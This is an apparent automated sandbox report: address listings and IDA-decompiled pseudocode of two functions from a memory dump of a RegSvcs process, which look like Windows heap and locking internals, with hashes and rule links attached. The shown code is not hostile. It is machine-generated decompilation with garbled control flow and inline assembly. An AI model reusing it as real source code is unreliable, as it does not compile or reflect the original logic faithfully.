0x00fd45ca
0x00000000
0x00fd4247
0x00fd4247
0x00fd4247
0x00fd4249
0x00fd4249
0x00fd4249
0x00fd4251
0x00fd4251
0x00fd4257
0x00fd425f
0x00fd426e
0x00fd4270
0x00fd427a
0x0101e219
0x0101e219
0x00fd4280
0x00fd4282
0x00fd4456
0x00fd45ea
0x00000000
0x00fd45f0
0x0101e223
0x00000000
0x0101e223
0x00fd445c
0x00fd445c
0x00000000
0x00fd445c
0x00000000
0x00fd4288
0x00fd428c
0x0101e298
0x00fd4292
0x00fd4292
0x00fd429e
0x00fd42a3
0x00fd42a7
0x00fd42ac
0x0101e22d
0x00fd42b2
0x00fd42b2
0x00fd42b9
0x00fd42bc
0x00fd42c2
0x00fd42ca
0x00fd42cd
0x00fd42cd
0x00fd42d4
0x00fd433f
0x00fd433f
0x00fd42d6
0x00fd42d6
0x00fd42d9
0x00fd42dd
0x00fd42eb
0x0101e23a
0x00fd42f1
0x00fd4305
0x00fd430d
0x00fd4315
0x00fd4318
0x00fd431f
0x00fd4322
0x00fd432e
0x00fd433b
0x00fd433b
0x00000000
0x00fd432e
0x00fd42eb
0x00fd434c
0x00fd434e
0x00fd4352
0x00fd4359
0x00fd435e
0x00fd4361
0x00fd436e
0x00fd438a
0x00fd438e
0x00fd4396
0x00fd439e
0x00fd43a1
0x00fd43ad
0x00fd43bb
0x00fd43bb
0x00fd43ad
0x00fd436e
0x00fd43bf
0x00fd43c5
0x00fd4463
0x00fd4463
0x00fd43ce
0x00fd43d5
0x00fd43d9
0x00fd43df
0x00fd4475
0x00fd4479
0x00fd4491
0x00fd4491
0x00fd4479
0x00fd43e5
0x00fd43eb
0x00fd43f4
0x00fd43f6
0x00fd43f9
0x00fd43fc
0x00fd43ff
0x00fd44e8
0x00fd44ed
0x00fd44f3
0x0101e247
0x00000000
0x00fd44f9
0x00fd4504
0x00fd4508
0x00fd450f
0x0101e269
0x00000000
0x00fd4515
0x00fd4519
0x00fd4531
0x00fd4534
0x00fd4537
0x00fd453e
0x00fd4541
0x00fd454a
0x0101e255
0x0101e255
0x0101e25b
0x0101e25e
0x0101e261
0x0101e261
0x00fd4555
0x00fd4559
0x00fd455d
0x0101e26d
0x0101e270
0x0101e274
0x0101e27a
0x0101e27d
0x0101e28e
0x0101e28e
0x00fd4563
0x00fd4563
0x00fd4569
0x00fd4569
0x00000000
0x00fd455d
0x00fd450f
0x00000000
0x00fd44f3
0x00fd43ff
0x00fd4405
0x00fd4405
0x00fd4405
0x00fd42ac
0x00fd428c
0x00fd4282
0x00fd4407
0x00fd440d
0x0101e2af
0x0101e2af
0x00fd4413
0x00fd4413
0x00000000
0x00fd41d4
0x00000000
0x00fd41c3
0x00fd41bd
0x00fd4415
0x00fd4415
0x00fd4416
0x00fd4417
0x00fd4429
0x00fd416e
0x00fd416e
0x00fd4175
0x00fd4498
0x00fd449f
0x0101e12d
0x00000000
0x0101e133
0x00000000
0x0101e133
0x00fd44a5
0x00fd44a5
0x00fd44aa
0x00000000
0x00fd44bb
0x00fd44ca
0x00fd44d6
0x00fd44d7
0x00fd44d8
0x00fd44e3
0x00fd44e3
0x00fd44aa
0x00fd417b
0x00fd417b
0x00fd417b
0x00000000
0x00fd417b
0x00fd4175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fa8ddcbe3f39c81c6910ed086c870e63eb6e9910d4af360443a138193221c6
Instruction ID: cb7fb3c9f4563edf1ca188982268c0f448317228b594a5587528d39d2480f17e
Opcode Fuzzy Hash: 69fa8ddcbe3f39c81c6910ed086c870e63eb6e9910d4af360443a138193221c6
Instruction Fuzzy Hash: 22F17C716082118FC725DF19C480B7AB7E2BF89714F18496EF986CB351E738E885EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FE20A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00FE20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x10a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00FE2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00FE2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00FB58EC(_t240);
									_t221 =  *0x10a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x10a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00FF4A2C(0x10a6e40, 0xff4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00FD7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xf95c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00FEF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00FEF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01037016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00FD2400(_t267 + 0x20);
															}
															L00FD2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00FE2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00FD2280(_t134, 0x10a8608);
									__eflags =  *0x10a6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00FCFFB0(_t198, _t241, 0x10a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x10a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x10a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00FE6B90(_t210,  &_v64);
										_t262 =  *0x10a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00FEE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00FF97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00FF006A(0x10a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x10a8608);
												E00FFB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x10a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x10a6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00FCFFB0(_t198, _t240, 0x10a8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00FF00C2(0x10a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x00fe20a0
0x00fe20a8
0x00fe20ad
0x00fe20b3
0x00fe20b8
0x00fe20c2
0x00fe20c7
0x00fe20cb
0x00fe20d2
0x00fe2263
0x00fe2266
0x01025836
0x01025836
0x00000000
0x00fe226c
0x00fe226c
0x00fe2270
0x00fe2274
0x00fe20e2
0x00fe20e2
0x00fe20e6
0x00fe20ee
0x010257dc
0x010257de
0x010257ec
0x010257ec
0x010257f1
0x010257f3
0x010257f8
0x00000000
0x010257f8
0x010257e0
0x010257e4
0x010257ea
0x00000000
0x00000000
0x00000000
0x010257ea
0x00fe20f4
0x00fe20f4
0x00fe20f8
0x00fe20f8
0x00fe20fc
0x00fe2100
0x00fe2106
0x00fe2201
0x00fe2206
0x00fe220b
0x00fe220e
0x00fe22a9
0x00fe22ac
0x00000000
0x00000000
0x00fe22b2
0x00fe22b5
0x01025801
0x01025806
0x00000000
0x00000000
0x01025810
0x01025815
0x01025818
0x00000000
0x00000000
0x0102581e
0x00fe22bb
0x00fe22bb
0x00fe2218
0x00fe2218
0x00fe221c
0x00fe2220
0x00fe2222
0x00fe22c2
0x00fe22c4
0x00fe22dc
0x00fe22dc
0x00fe22e1
0x00000000
0x00000000
0x00000000
0x00fe22e7
0x00fe22c8
0x00fe22cd
0x00fe22d3
0x00fe22d6
0x01025823
0x01025825
0x01025827
0x00000000
0x00000000
0x0102582d
0x00000000
0x0102582d
0x00000000
0x00fe2228
0x00fe2228
0x00000000
0x00fe2228
0x00fe2222
0x00fe2214
0x00fe2214
0x00000000
0x00fe2114
0x00fe2114
0x00fe2114
0x00fe211a
0x00fe211c
0x00fe2348
0x00fe234d
0x01025840
0x01025845
0x01025848
0x0102584e
0x0102584e
0x01025848
0x00fe2353
0x00fe2355
0x00fe2388
0x00fe2388
0x00fe2368
0x00fe236a
0x00fe236c
0x00fe238f
0x00000000
0x00fe236e
0x00fe236e
0x00fe218e
0x00fe218e
0x00fe2191
0x00fe2195
0x01025a03
0x01025a06
0x01025a0c
0x01025a0f
0x01025a11
0x01025a13
0x01025a13
0x01025a19
0x01025a1f
0x00000000
0x00fe219b
0x00fe219b
0x00fe21a0
0x00fe2282
0x00fe2284
0x00fe2284
0x00fe2284
0x00fe2284
0x00fe21a6
0x00fe21a9
0x00fe21ac
0x00fe21ae
0x00fe21b3
0x00fe228b
0x00fe2290
0x00fe2379
0x00fe2296
0x00fe2298
0x00fe2298
0x00fe2290
0x00fe21b9
0x00fe21be
0x00fe22a2
0x00fe22a2
0x00fe21c4
0x00fe21c8
0x00fe21cc
0x00fe21d0
0x00fe21d4
0x00fe21de
0x00fe21e3
0x01025a29
0x01025a2c
0x00000000
0x00000000
0x01025a3b
0x00000000
0x00fe21e9
0x00fe21e9
0x00fe21e9
0x00fe21ee
0x00fe21f1
0x01025a45
0x01025a4b
0x01025a52
0x01025a58
0x01025a5d
0x01025a5f
0x01025a71
0x01025a61
0x01025a6a
0x01025a6a
0x01025a76
0x01025a79
0x01025a7f
0x01025a83
0x01025a85
0x01025a87
0x01025a87
0x01025a8c
0x01025a91
0x01025a97
0x01025a9f
0x01025aa0
0x01025aa1
0x01025aa6
0x01025aab
0x01025ab1
0x01025ab3
0x01025ab9
0x01025aca
0x01025ad4
0x01025ad4
0x01025ade
0x01025ade
0x01025aab
0x01025a79
0x01025a52
0x00fe21f7
0x00fe21f9
0x00fe21fe
0x00fe21fe
0x00fe21e3
0x00fe2195
0x00fe236c
0x00fe2122
0x00fe2122
0x00fe2124
0x00fe2231
0x00fe2236
0x00fe2236
0x00fe2238
0x00fe2238
0x00fe2240
0x00fe2242
0x00fe2244
0x010259fc
0x00fe218c
0x00fe218c
0x00000000
0x00fe218c
0x00fe224a
0x00fe224f
0x00fe2256
0x00fe2304
0x00fe2309
0x00fe230f
0x00fe231e
0x00fe231e
0x00fe231e
0x00fe2320
0x00fe2325
0x00fe232a
0x00fe232c
0x00fe233e
0x00fe233e
0x00000000
0x00fe232c
0x00fe2311
0x00fe2317
0x00fe231a
0x00fe231c
0x00fe2380
0x00fe2380
0x00fe2380
0x00fe2384
0x00000000
0x00000000
0x00fe2386
0x00000000
0x00fe231c
0x00fe225c
0x00fe225c
0x00000000
0x00fe225c
0x00fe212a
0x00fe2134
0x00fe2138
0x00fe213d
0x01025858
0x01025863
0x01025863
0x01025867
0x0102586a
0x00000000
0x00000000
0x0102586c
0x0102586c
0x01025871
0x01025875
0x01025877
0x01025997
0x0102599c
0x010259a1
0x010259a7
0x010259a7
0x00000000
0x010259a7
0x0102587d
0x00000000
0x0102588b
0x0102588b
0x01025890
0x01025892
0x01025894
0x01025899
0x0102589b
0x010258a0
0x010258a0
0x010258aa
0x010258b2
0x010258b6
0x010258be
0x010258c6
0x010258c9
0x0102590d
0x01025917
0x0102591a
0x0102591c
0x01025920
0x01025928
0x0102592a
0x0102592c
0x0102592e
0x0102592e
0x010258cb
0x010258cd
0x010258d8
0x010258e0
0x010258f4
0x010258fe
0x010258fe
0x0102593a
0x0102593e
0x01025940
0x01025942
0x00000000
0x01025944
0x01025944
0x01025949
0x0102594e
0x0102594e
0x01025953
0x0102595b
0x01025976
0x01025976
0x0102597a
0x0102597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01025981
0x01025981
0x01025981
0x01025983
0x01025988
0x0102598d
0x01025991
0x01025991
0x00000000
0x0102595d
0x0102595d
0x01025963
0x01025965
0x00000000
0x00000000
0x00000000
0x00000000
0x01025967
0x01025967
0x0102596b
0x0102596d
0x00000000
0x00000000
0x0102596f
0x01025971
0x01025971
0x01025974
0x00000000
0x00000000
0x00000000
0x01025974
0x00000000
0x01025967
0x0102595b
0x01025942
0x01025863
0x00fe2143
0x00fe2143
0x00fe2149
0x00fe214f
0x00fe22f1
0x00fe22f6
0x00000000
0x00fe2173
0x00fe2173
0x00fe217d
0x00fe2181
0x00fe2186
0x010259ae
0x010259b2
0x010259b5
0x010259b7
0x010259ba
0x010259cd
0x010259d1
0x010259d5
0x010259d9
0x010259db
0x00000000
0x00000000
0x010259dd
0x010259dd
0x010259e1
0x010259e4
0x010259e7
0x010259ee
0x010259ee
0x010259f3
0x010259f3
0x00000000
0x00fe2186
0x00fe214f
0x00fe2106
0x00fe2266
0x00fe20d8
0x00fe20da
0x00fe20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b14e14bcb4e3af37236bdf3a3bb117f0c67a9e60e6736aa9d9c963299c6bd15
Instruction ID: 19dcd2f1a7c8d764c1ca47679f352a16c353fde703963ba01708cf8503dc6bef
Opcode Fuzzy Hash: 0b14e14bcb4e3af37236bdf3a3bb117f0c67a9e60e6736aa9d9c963299c6bd15
Instruction Fuzzy Hash: 88F16831A083818FE7A5CF29CC4076A77E9BF85320F08856DF9D59B281E779D840DB86

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB236 Relevance: .3, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00FDB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E00FDB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0105CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E00FE0678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E00FF9660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E00FF9660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E00FF9660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E00FE174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E00FE138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E00FD7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E0107138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E00FD7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01071582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E00FD7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E00FD7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
